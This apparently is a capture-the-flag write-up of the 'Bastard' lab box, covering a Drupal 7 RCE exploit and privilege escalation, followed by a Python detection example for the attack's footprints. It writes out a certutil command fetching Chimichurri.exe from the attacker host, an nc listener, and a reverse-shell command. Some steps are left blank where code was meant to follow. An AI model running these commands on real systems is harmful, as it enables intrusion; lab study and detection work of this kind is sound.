nmap -sC -sV -oN bastard.nmap -vvv 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up, received syn-ack (0.19s latency).
Scanned at 2020-06-04 20:03:24 +08 for 89s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT      STATE SERVICE REASON  VERSION
80/tcp    open  http    syn-ack Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun  4 20:04:53 2020 -- 1 IP address (1 host up) scanned in 89.47 seconds
I was using nikto -host 10.10.10.9 and found that there is a robots.txt. There are other text files as well, but robots.txt may give good information about the web directories.
By reading robots.txt I found that there is a CHANGELOG.txt; this file gives the Drupal version.
The version is found to be 7.54.
Use the drupal exploit
By using DuckDuckGo I found that there is a Drupal 7.x Services module unserialize() to RCE exploit.
There is a PoC PHP script that first uses the SQL injection exploit, which produces session.json, and then runs the remote code execution exploit.
Some modifications are needed to the original PHP code.
The $url variable I need to change to Bastard's IP address.
There is a rest directory, found after enumeration with gobuster against http://10.10.10.9:
gobuster dir -u http://10.10.10.9 --wordlist=/usr/share/wordlists/dirb/big.txt -s 200,301,302 -o bastard.go --timeout 30s
$endpoint_path I change to
My searchsploit is updated and has this exploit.
To copy this exploit over to my current directory I use the mirror option (-m; -p would only print the path):
searchsploit -m 41564
My modification is below:
To run the exploit
I use whoami to test the command execution, and it worked.
There are two JSON files fished out by the SQL injection exploit, but I will not be using them.
I downloaded Chimichurri.exe to my attacker machine and will upload this local privilege escalation program to the Bastard machine.
I set up a simple HTTP server with python3,
python3 -m http.server 80, then I use the command execution to download the program:
certutil -f -urlcache http://10.10.14.3/Chimichurri.exe chimichurri.exe
After chimichurri was uploaded, I set up
nc -lvnp 4444 to wait for the connection.
On command execution I will use
chimichurri 10.10.14.3 4444.
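From the defender's side, the two host-level footprints of this chain are the web server's worker process spawning a shell, and certutil being used to pull a file from a remote URL. The following is an added example, not part of the writeup, that runs two such rules over constructed process-creation events; the worker process names (w3wp.exe, php-cgi.exe) and the sample paths are assumptions.

```python
import ntpath
import re

# Assumed names of the IIS/PHP worker processes that would host the Drupal site.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}
# Children that should not normally be spawned by a web worker.
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe", "whoami.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def base(path):
    """Lower-cased file name of a Windows path, e.g. C:\\x\\CMD.EXE -> cmd.exe."""
    return ntpath.basename(path).lower()

def classify(event):
    """Return the names of the detection rules matching one process-creation event."""
    hits = []
    image, parent, cmdline = base(event["image"]), base(event["parent"]), event["cmdline"]
    # Rule 1: certutil used as a download cradle (-urlcache together with a remote URL).
    if image == "certutil.exe" and "-urlcache" in cmdline.lower() and URL_RE.search(cmdline):
        hits.append("certutil_download")
    # Rule 2: the web server's worker spawning a shell or LOLBin, the footprint of
    # command execution obtained through a web application bug.
    if parent in WEB_WORKERS and image in SHELLS_AND_LOLBINS:
        hits.append("web_worker_spawned_shell")
    return hits

def analyze(events):
    """Map event index -> matched rules, leaving out events that matched nothing."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

# Constructed sample events (Sysmon Event ID 1 style fields), not logs from the box;
# the first two mirror the whoami test and the certutil download from the writeup.
SAMPLE_EVENTS = [
    {"parent": r"C:\PHP\php-cgi.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\PHP\php-cgi.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -f -urlcache http://10.10.14.3/Chimichurri.exe chimichurri.exe"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},  # benign certutil use, no hit
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, rules in analyze(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", ", ".join(rules))
```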